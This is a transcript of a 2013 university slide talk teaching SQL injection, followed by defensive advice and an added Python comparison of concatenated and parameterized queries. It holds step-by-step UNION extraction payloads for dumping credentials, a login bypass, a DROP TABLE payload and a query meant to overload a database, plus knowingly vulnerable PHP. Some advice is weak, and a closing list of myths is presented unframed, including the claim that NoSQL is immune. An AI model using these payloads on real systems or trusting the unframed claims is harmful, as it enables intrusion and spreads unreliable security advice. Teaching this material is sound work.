A Brief Introduction in SQL Injection
  • Tables have relations with each other. Inserting rows into tables with unauthorized access.

Presentation Transcript

  • Security Lab, University Putra Malaysia, 23 May 2013. Sina Manavi. Contact: http://sinamanavi.blogspot.com/p/about-me.html
  • Introduction
  • Why SQL Injection
  • What is needed for this
  • What you can do with SQL Injection
  • What are its pros and cons
  • Why we need to know and how we can prevent our database from SQL injection attacks
  • We are all familiar with SQL. It is one of the technologies that helped convert the static web into a dynamic one. SQL is relatively easy to read, a little more difficult to write. It works on servers such as Apache, MS Server, etc. SQL Injection means manipulating SQL tables with unauthorized access.
  • SQL Injection may happen in only two forms, UI based or URL based:
    ◦ (1) Injecting into a form, such as the username and password boxes on a login page.
    ◦ (2) Injecting into a URL, like http://yourtarget.com/products/list.php?pid=10
  • Simple example:
    ◦ SELECT ID FROM tbl_users WHERE ID="Uid" AND pass="pass"
    ◦ If it returns any value, the current inputs are correct.
  • URL based injection: if you want to view a record from a table by URL, www.yourtarget.com/list?id=5 runs:
    ◦ SELECT * FROM tbl_users WHERE id=5
  • The "INFORMATION_SCHEMA" holds the names of every table and column on a site; its name will never change.
    ◦ Table holding all the table names: "INFORMATION_SCHEMA.TABLES"
    ◦ Table holding all the column names: "INFORMATION_SCHEMA.COLUMNS"
  • Finding the column quantity:
    ◦ www.yourtarget.com/list.php?ID=10+ORDER+BY+1--
    ◦ Increase the 1 until you get an error; the last number that worked is the column number.
  • Finding the table name:
    ◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
    ◦ And it shows: tbl_user
    ◦ To be continued
  • Now it's time to find out the column names:
    ◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'--
    ◦ The result would be as follows: id, username, password
  • Column names finding step:
    ◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=UserAccounts+AND+column_name>displayed_column--
    ◦ Try the column names until you find your target (e.g. username, password, or login).
  • And finally it's time to see the records:
    ◦ www.yourtarget.com/list.php?=-1+UNION+SELECT+1,username,3+FROM+UserAccounts--
    ◦ and www.yourtarget.com/list.php?=-1+UNION+SELECT+1,password,3+FROM+UserAccounts--
    ◦ Username=admin password=123456
    ◦ Stupid admin ha ;)
  • Now we can alter the records as well, let's rock:
    ◦ UPDATE tbl_user SET password = SHA2($password) WHERE id = $id
    ◦ Or we can insert a new user with the INSERT command.
  • If user_list contains 1000 records, then the database is fired up by:
    ◦ SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
  • Insert newuser into tbl_user. The malicious code can be:
    ◦ DROP TABLE tbl_user
  • How it works:
    ◦ SELECT * FROM tbl_users WHERE id="Fname" AND pass="pass"
    ◦ Malicious code: SELECT * FROM table WHERE id='Fname' OR 1=1;
    ◦ if(mysql_num_rows($result)) // do login
    ◦ Now the unauthorized user gets access easily and bypasses the authorization.
  • Security is the developer's job. No database, connector, or framework can prevent SQL injection all the time.
  • Implement proper error handling. This would include using a single error message for all errors.
  • Lock down the user database configuration: specify users, roles and permissions, etc.
  • Prefix and append a quote to all user input, even if the data is numeric.
  • PHP example:

        <?php
        function sanitize($string) {
            $string = strip_tags($string);
            $string = htmlspecialchars($string);
            $string = trim(rtrim(ltrim($string)));
            $string = mysql_real_escape_string($string);
            return $string;
        }
        $password = sanitize($_POST["password"]);
        // note: $password is escaped but interpolated into the query without quotes,
        // and $user_id is interpolated without any escaping at all
        mysql_query("UPDATE Users SET password = $password WHERE user_id = $user_id");
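As an added example (not from the slides), the login check and the numeric URL id discussed above, first built by string concatenation and then with bound parameters, run against an in-memory SQLite table with constructed rows; the "or 1=1" input from the slides is tried against both versions:

```python
import sqlite3

# Constructed sample data standing in for tbl_users; not from the slides.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO tbl_users (username, password) VALUES (?, ?)",
                   [("admin", "123456"), ("alice", "s3cret")])
    db.commit()
    return db

def login_vulnerable(db, username, password):
    # The input is spliced into the SQL text, so a quote in the input ends the
    # string literal and the rest of the input is parsed as SQL (the
    # "... or 1=1" case from the slides).
    sql = (f"SELECT * FROM tbl_users WHERE username='{username}' "
           f"AND password='{password}'")
    return len(db.execute(sql).fetchall()) > 0

def login_parameterized(db, username, password):
    # The SQL text is fixed; values are bound separately and never re-parsed,
    # so a quote or "OR 1=1" stays inside the string value being compared.
    sql = "SELECT * FROM tbl_users WHERE username=? AND password=?"
    return len(db.execute(sql, (username, password)).fetchall()) > 0

def fetch_by_id(db, raw_id):
    # URL parameter like list.php?id=5: accept only a plain integer, then bind
    # it anyway rather than concatenating it into the query.
    if not raw_id.strip().isdigit():
        return None
    return db.execute("SELECT * FROM tbl_users WHERE id=?", (int(raw_id),)).fetchone()

if __name__ == "__main__":
    db = make_db()
    payload = "x' OR 1=1 --"   # goes in the username field; password is irrelevant
    print("vulnerable   :", login_vulnerable(db, payload, "wrong"))     # True
    print("parameterized:", login_parameterized(db, payload, "wrong"))  # False
    print("by id        :", fetch_by_id(db, "1"))                       # (1, 'admin', '123456')
    print("by id (union):", fetch_by_id(db, "-1 UNION SELECT 1,2,3"))   # None
```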
  • Vipin Samar, Oracle vice president of Database Security: "Database Firewall is a good first layer of defense for databases but it won't protect you from everything."
  • Using stored procedures:

        CREATE PROCEDURE SP_show_user(IN U_ID INT)
        BEGIN
            SELECT * FROM Bugs WHERE User_ID = U_ID;
        END

        CALL SP_show_user(54)

    "Might be helpful but still vulnerable"
  • I don't have to worry anymore
  • Escaping is the fix
  • More escaping is better
  • I can code an escaping function
  • Only user input is unsafe
  • Stored procs are the fix
  • SQL privileges are the fix
  • My app doesn't need security
  • Frameworks are the fix
  • Parameters quote for you
  • Parameters are the fix
  • Parameters make queries slow
  • SQL proxies are the fix
  • NoSQL databases are the fix
  • NoSQL databases are immune to SQL injection.